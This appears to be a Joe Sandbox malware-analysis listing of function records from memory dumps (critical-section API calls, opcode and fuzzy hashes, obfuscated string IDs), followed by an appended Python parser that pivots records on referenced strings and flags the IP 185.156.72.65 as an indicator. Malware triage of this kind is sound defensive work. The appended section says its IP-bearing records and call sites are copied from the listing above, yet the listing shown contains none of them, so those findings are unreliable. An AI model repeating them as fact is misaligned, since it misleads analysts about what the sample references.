                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: G@ZK$[@G_
                      • API String ID: 4132704954-2338778587
                      • Opcode ID: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                      • Instruction ID: a76d8c0da3bd43c517cb6c8633e47b6ba9047f3d1c89867115d964fd2ba21ff6
                      • Opcode Fuzzy Hash: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                      • Instruction Fuzzy Hash: D40126F0F41204DBD720EFB8EC40E6AB7B0AB89300FA005BAE41957360DB3568418B05
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004084EE
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: G@ZK$[@G_
                      • API String ID: 2296764815-2338778587
                      • Opcode ID: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                      • Instruction ID: 2d9fbaa08c13fc83b2f5e0005e6d1fa5ae776f13101647786266d8808d8cc77d
                      • Opcode Fuzzy Hash: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                      • Instruction Fuzzy Hash: F501DB70F00285DFC710EBB9AD41969B7A0A719310BA1417EE526BB3D2EA79AC01CB4D
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00407EEE
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: G@ZK$[@G_
                      • API String ID: 2296764815-2338778587
                      • Opcode ID: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                      • Instruction ID: 86c78c31387f24dba649c5f85d45a7e4d1f1fe09f4149f0eb9c238fce71b3fdb
                      • Opcode Fuzzy Hash: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                      • Instruction Fuzzy Hash: D601D6F0F05244DBD720DBA9AC41A6AB7B0AB09304F9005BAF51977792DA396C41CB49
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 049470A0
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: ZF\KK.$three
                      • API String ID: 4132704954-2602870784
                      • Opcode ID: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                      • Instruction ID: 32f0fb0bbcc497bc16eab79356d9c0302661b9f5b6920db0582996432697a803
                      • Opcode Fuzzy Hash: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                      • Instruction Fuzzy Hash: 0801AD74F04208DBCB20DFF8E941F4DB3B0AB94314FA001BAD815A73A0D7346906DB19
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04947B00
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: @G@K$A@K.
                      • API String ID: 4132704954-2457859030
                      • Opcode ID: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                      • Instruction ID: ae6e38a2d9a790e630d43c400321147d89a6ac1431e6e1726f08a19ab9d4445d
                      • Opcode Fuzzy Hash: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                      • Instruction Fuzzy Hash: 130181B4F40208DFC720DFA8E946E5DB7B0E788304FA001BAD916A7390D775AA458B59
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04947C10
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: @G@K$ZYA.
                      • API String ID: 4132704954-4236202813
                      • Opcode ID: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                      • Instruction ID: 9f387d827fc8b13cf67346f365b1805bc6b9ede67e1448d65a2eaf7ca2632e97
                      • Opcode Fuzzy Hash: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                      • Instruction Fuzzy Hash: 6C01AD74F00208DFCB24EFA8E991A4DBBB0EB84310F9000BAD82557350D6757945CB49
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00407899
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: @G@K$A@K.
                      • API String ID: 2296764815-2457859030
                      • Opcode ID: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                      • Instruction ID: 02867bdc75deabfbdae8ac7f1914e191d6f0b036ba1bc0e64f50d331b9525a60
                      • Opcode Fuzzy Hash: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                      • Instruction Fuzzy Hash: 94016271F042049BC710DF58E946A58B7B0EB48304F60417BE906A7392D779AE418B5D
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004079A9
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: @G@K$ZYA.
                      • API String ID: 2296764815-4236202813
                      • Opcode ID: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                      • Instruction ID: d8be7bc43f2ac3a424769131d28bfe1308d6783f1b1820d008cdb8cd51ef09c0
                      • Opcode Fuzzy Hash: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                      • Instruction Fuzzy Hash: D3018174F04248DFCB24EFA8E992A5CBBB0AB04300F90417BE915A7392D6786D01CB5D
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00406E39
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: ZF\K$three
                      • API String ID: 2296764815-3094064056
                      • Opcode ID: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                      • Instruction ID: 29344792781c46cc919c6541bc41426b34b2da4dd82bbb0e7b349b67a9b0c42f
                      • Opcode Fuzzy Hash: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                      • Instruction Fuzzy Hash: DF01D134F04204DBCB20DFA9E882B9CB3B0EB04314FA0017AED06A7391DA385D42DB4D
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04946F00
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: CGV.$mix
                      • API String ID: 4132704954-1644454629
                      • Opcode ID: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                      • Instruction ID: d34299010a2d6706f61b62430f6ca4b715352e3984b3d41a14ebe1e696052168
                      • Opcode Fuzzy Hash: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                      • Instruction Fuzzy Hash: B7F096B4F44204DBDB10EFB8E942E5D77E0AB85314FE001B5E90697390D6357A458B59
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00406C99
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: CGV.$mix
                      • API String ID: 2296764815-1644454629
                      • Opcode ID: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                      • Instruction ID: 24033b3836d6b4f620cd462d172ded2aeb793c2235c3ef6269eb5d899298d204
                      • Opcode Fuzzy Hash: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                      • Instruction Fuzzy Hash: 2AF062B0F082049BDB10EBA9E982E5877A0AB45314FA4017AE906A77D2D6386D418B5D
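The records above are easier to triage once pivoted on their String IDs: the same IPv4 literal, 185.156.72.65, is referenced by functions lifted from the mapped image at offset 00400000 (based on PE: true) and by functions in the separate region at 04940000 (based on PE: false). The following parser is an added example, not part of the Joe Sandbox report or of its IDA plugin. It assumes the bullet-per-line record layout shown above (a record opens with "APIs" and closes with its "Instruction Fuzzy Hash" line), treats the call-site address on the "__Init_thread_footer ... ref:" line as the handle for the listed function (the listing never states a function's own start address), and assumes the report joins multiple strings with "$", so a literal "$" inside a string cannot be told apart from a separator. The sample input is a constructed excerpt of three records copied from the listing, with the Opcode/Instruction ID lines dropped.

```python
"""Pivot a Joe Sandbox function listing on the strings each function references.

Added example, not part of the Joe Sandbox report or its IDA plugin.
Assumptions: the "__Init_thread_footer ... ref:" call site stands in for the
listed function, and multiple String IDs are joined with "$".
"""
import re
from collections import defaultdict

# Constructed excerpt: three records copied from the listing above (hashes kept
# verbatim, Opcode/Instruction ID lines dropped to keep the sample short).
SAMPLE = r"""
APIs
  • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
• __Init_thread_footer.LIBCMT ref: 049413FB
Strings
Memory Dump Source
• Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
Similarity
• API ID: CriticalSection$EnterLeave$Init_thread_footer
• String ID: 185.156.72.65$185.156.72.65
• API String ID: 4132704954-2656946096
• Instruction Fuzzy Hash: 722129B0F002449EDB24EFB4E929BA97BB0FF81308F9001B9D80557251D7B57585CB59
APIs
  • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
• __Init_thread_footer.LIBCMT ref: 00401084
  • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
Memory Dump Source
• Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
• String ID: 185.156.72.65$185.156.72.65
• Instruction Fuzzy Hash: E32137B0F002859EDB14EFA4D9557A97BB0EB01308F90017EE4457B3A2D7B85985CB5D
APIs
• __Init_thread_footer.LIBCMT ref: 049470A0
Memory Dump Source
• Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
Similarity
• API ID: CriticalSection$EnterLeave$Init_thread_footer
• String ID: ZF\KK.$three
• Instruction Fuzzy Hash: 0801AD74F04208DBCB20DFF8E941F4DB3B0AB94314FA001BAD815A73A0D7346906DB19
"""

# Top-level API call made by the listed function itself (carries the call site).
REF_RE = re.compile(r"^• (?P<api>\S+) ref: (?P<addr>[0-9A-F]{8})$")
# API reached through a callee; the module suffix (NTDLL/KERNEL32) is kept.
SUBCALL_RE = re.compile(r"^• Part of subcall function (?P<callee>[0-9A-F]{8}): "
                        r"(?P<api>[A-Za-z_]+)\.(?P<module>\w+)")
SOURCE_RE = re.compile(r"^• Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-F]{8}), "
                       r"based on PE: (?P<pe>true|false)$")
FIELD_RE = re.compile(r"^• (?P<key>API ID|String ID|API String ID|Instruction Fuzzy Hash): (?P<val>.*)$")


def parse_records(text):
    """Split the listing into records; each record becomes a dict of its fields."""
    records, cur = [], None
    for line in (l.strip() for l in text.splitlines()):
        if line == "APIs":                        # every record opens with this heading
            cur = {"apis": set(), "subcalls": set(), "strings": ()}
        elif cur is None:
            pass                                  # text outside any record
        elif (m := REF_RE.match(line)):
            cur["apis"].add(m["api"])
            cur.setdefault("func", int(m["addr"], 16))   # first call site stands in for the function
        elif (m := SUBCALL_RE.match(line)):
            cur["subcalls"].add(f"{m['api']}.{m['module']}")
        elif (m := SOURCE_RE.match(line)):
            cur["offset"] = int(m["offset"], 16)
            cur["based_on_pe"] = m["pe"] == "true"
        elif (m := FIELD_RE.match(line)):
            if m["key"] == "String ID":
                cur["strings"] = tuple(m["val"].split("$"))   # "$"-joined; a literal "$" is ambiguous
            elif m["key"] == "API ID":
                cur["api_id"] = m["val"]
            elif m["key"] == "Instruction Fuzzy Hash":        # last line of a record
                cur["fuzzy"] = m["val"]
                records.append(cur)
                cur = None
    return records


def pivot_by_string(records):
    """Map each referenced string to sorted (region offset, based_on_pe, call site) triples."""
    out = defaultdict(set)
    for r in records:
        for s in set(r["strings"]):
            out[s].add((r["offset"], r["based_on_pe"], r["func"]))
    return {s: sorted(v) for s, v in out.items()}


def regions_referencing(records, needle):
    """Distinct memory-dump offsets whose functions reference `needle`."""
    return sorted({r["offset"] for r in records if needle in r["strings"]})


def shared_across_regions(records):
    """Strings referenced from more than one dump region (e.g. mapped image and a non-PE region)."""
    return sorted(s for s, hits in pivot_by_string(records).items() if len({h[0] for h in hits}) > 1)


def find_ipv4_strings(records):
    """Dotted-quad literals among the referenced strings, a quick network-IOC pivot."""
    ip_re = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
    return sorted({s for r in records for s in r["strings"] if ip_re.match(s)})
```

Running `pivot_by_string(parse_records(SAMPLE))` on the excerpt shows the IP literal hit from both dump regions while "three" is seen only in the 04940000 region; applied to the full listing the same pivot gives, per string, every call site and region to follow up in the snapshot files named in the records.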